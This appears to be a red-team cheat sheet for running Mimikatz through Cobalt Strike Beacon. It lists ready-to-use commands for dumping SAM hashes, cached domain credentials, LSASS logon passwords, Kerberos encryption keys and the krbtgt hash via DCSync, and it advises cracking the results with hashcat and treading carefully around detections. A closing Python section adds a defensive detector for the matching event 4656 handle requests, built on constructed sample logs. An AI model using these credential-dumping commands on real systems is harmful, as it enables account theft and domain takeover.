Mimikatz

Cobalt Strike + Mimikatz

Cobalt Strike's built-in Mimikatz runs each mimikatz command in a new temporary process that is destroyed when the command finishes, so nothing (such as an elevated token) persists between calls. Because of this, commands that depend on each other must be chained in a single invocation, separated by a semicolon:

beacon> mimikatz token::elevate ; lsadump::sam

Modifier Keys

!

In most cases, the ! modifier is a direct replacement for token::elevate. For example:

beacon> mimikatz !lsadump::sam

@

The @ modifier impersonates Beacon's thread token before running the given command, which is useful in cases where Mimikatz needs to interact with a remote system, such as with dcsync.

beacon> mimikatz @lsadump::dcsync /user:DEV\krbtgt

Dumping Security Account Manager (SAM)

beacon> mimikatz !lsadump::sam

Note: This opens a handle to the SAM registry hive; see the "Suspicious SAM Hive Handle" detection.

Dumping Cached Domain Credentials (DCC)

beacon> mimikatz !lsadump::cache

We can crack the hashes with hashcat. Example hashes can be found here.

Note: This opens a handle to the SECURITY registry hive; see the "Suspicious SECURITY Hive Handle" detection.

Dumping NTLM Hashes

beacon> mimikatz !sekurlsa::logonpasswords

Note: Mimikatz's logonpasswords module opens a read handle to LSASS, which is logged as Windows event 4656 and is what the "Suspicious Handle to LSASS" detection catches. Use this cautiously, and only if needed.

Dumping Kerberos Encryption Keys

beacon> mimikatz !sekurlsa::ekeys

Note: This module also opens a read handle to LSASS, so the same event 4656 detection applies.
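The notes above name the handle events these commands leave behind. As an added example (not part of this page, Cobalt Strike or Mimikatz), the following Python applies those three detections to constructed, flattened event 4656 lines; it assumes object-access auditing with SACLs on LSASS and the hives is enabled so the events are written, and that the field names follow the Windows 4656 schema.

```python
import re
from typing import Dict, List, Optional, Tuple

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory
FIELD_RE = re.compile(r"(\w+)=(\S+)")

# Constructed sample lines in a flattened key=value rendering of Security event 4656
# ("A handle to an object was requested"), keeping only the fields the rules need.
SAMPLE_EVENTS = [
    r"EventID=4656 ObjectType=Process ObjectName=C:\Windows\System32\lsass.exe ProcessName=C:\Users\bob\update.exe AccessMask=0x1410",
    r"EventID=4656 ObjectType=Process ObjectName=C:\Windows\System32\lsass.exe ProcessName=C:\Windows\System32\svchost.exe AccessMask=0x1000",
    r"EventID=4656 ObjectType=Key ObjectName=\REGISTRY\MACHINE\SAM\SAM\Domains\Account ProcessName=C:\Users\bob\update.exe AccessMask=0x20019",
    r"EventID=4656 ObjectType=Key ObjectName=\REGISTRY\MACHINE\SECURITY\Cache ProcessName=C:\Users\bob\update.exe AccessMask=0x20019",
    r"EventID=4663 ObjectType=File ObjectName=C:\Temp\notes.txt ProcessName=C:\Windows\explorer.exe AccessMask=0x1",
]


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened event line into a field dictionary."""
    return dict(FIELD_RE.findall(line))


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return the detection name the notes above use, or None for a benign event."""
    if event.get("EventID") != "4656":
        return None
    obj_type, obj_name = event.get("ObjectType", ""), event.get("ObjectName", "")
    mask = int(event.get("AccessMask", "0"), 16)
    if obj_type == "Process" and obj_name.lower().endswith(r"\lsass.exe"):
        # logonpasswords/ekeys must read LSASS memory, so require PROCESS_VM_READ;
        # a query-only handle (0x1000) is routine for legitimate tooling.
        return "Suspicious Handle to LSASS" if mask & PROCESS_VM_READ else None
    if obj_type == "Key":
        parts = obj_name.upper().split("\\")  # ['', 'REGISTRY', 'MACHINE', <hive>, ...]
        if parts[:3] == ["", "REGISTRY", "MACHINE"] and len(parts) > 3:
            if parts[3] == "SAM":
                return "Suspicious SAM Hive Handle"
            if parts[3] == "SECURITY":
                return "Suspicious SECURITY Hive Handle"
    return None


def detect(lines: List[str]) -> List[Tuple[str, str]]:
    """Run each line through the rules; return (detection, requesting process) pairs."""
    hits = []
    for line in lines:
        event = parse_event(line)
        name = classify(event)
        if name:
            hits.append((name, event.get("ProcessName", "?")))
    return hits
```

Running detect(SAMPLE_EVENTS) flags the three handles opened by update.exe and ignores the query-only svchost handle and the unrelated file event.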
